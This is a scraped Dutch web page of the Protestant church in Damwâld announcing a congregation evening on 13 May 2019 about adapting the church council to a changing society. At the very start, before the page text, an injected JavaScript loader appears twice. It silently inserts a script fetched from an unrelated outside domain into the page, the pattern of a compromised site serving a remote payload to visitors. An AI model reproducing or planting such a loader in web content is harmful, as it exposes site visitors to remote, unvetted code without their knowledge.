;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); (Extra-) gemeenteavond Hervormd Akkerwoude c.a. - PKN Damwâld
13 mei 2019
19:30 t/m 21:00
't Skûlplak
(Extra-) gemeenteavond Hervormd Akkerwoude c.a.

De maatschappij verandert en het kan haast niet anders, of de kerk verandert mee. De tijd dat de kerken op zondag vol zaten, lijkt voorbij. En was het ambtsdragersschap zo’n 20 jaar geleden nog een erebaantje, tegenwoordig is het een hele klus om genoeg ouderlingen of diakenen te vinden. Daarom is het goed om vooruit te kijken. Hoe willen we in de komende tijd kerk zijn met elkaar en welke veranderingen moeten wij doorvoeren om ‘overeind’ te blijven. In de kerkenraad zijn we alvast begonnen hoe we de invulling van de kerkenraad ‘toekomstbestendig’ kunnen maken. Dat zal met zich meebrengen dat vertrouwde structuren zullen veranderen. Natuurlijk gebeurt dat niet van de ene op de andere dag. Daarom nodigen we iedereen ‘dringend’ uit om met ons mee te denken op de komende gemeenteavond op 13 mei 2019, 19.30 uur in ‘t Skûlplak. We hopen hiermee onze gemeente een gezonde basis voor de toekomst te geven, waarin voortgang van de verkondiging van Gods woord en omzien naar elkaar centraal staan. Dit geeft nieuwe uitdagingen, nieuwe kansen en nieuwe mogelijkheden. Het zal vast niet allemaal in één keer vanzelf gaan, maar als we er met z’n allen aan meewerken kunnen we bouwen aan een gemeente waarin velen zich thuis voelen, divers, met respect voor elkaars verschillen, een kleurrijk geheel. De kerk, dat zijn we immers samen!

Locatie: 't SkûlplakBûterblom 8, 9104 JE Damwâld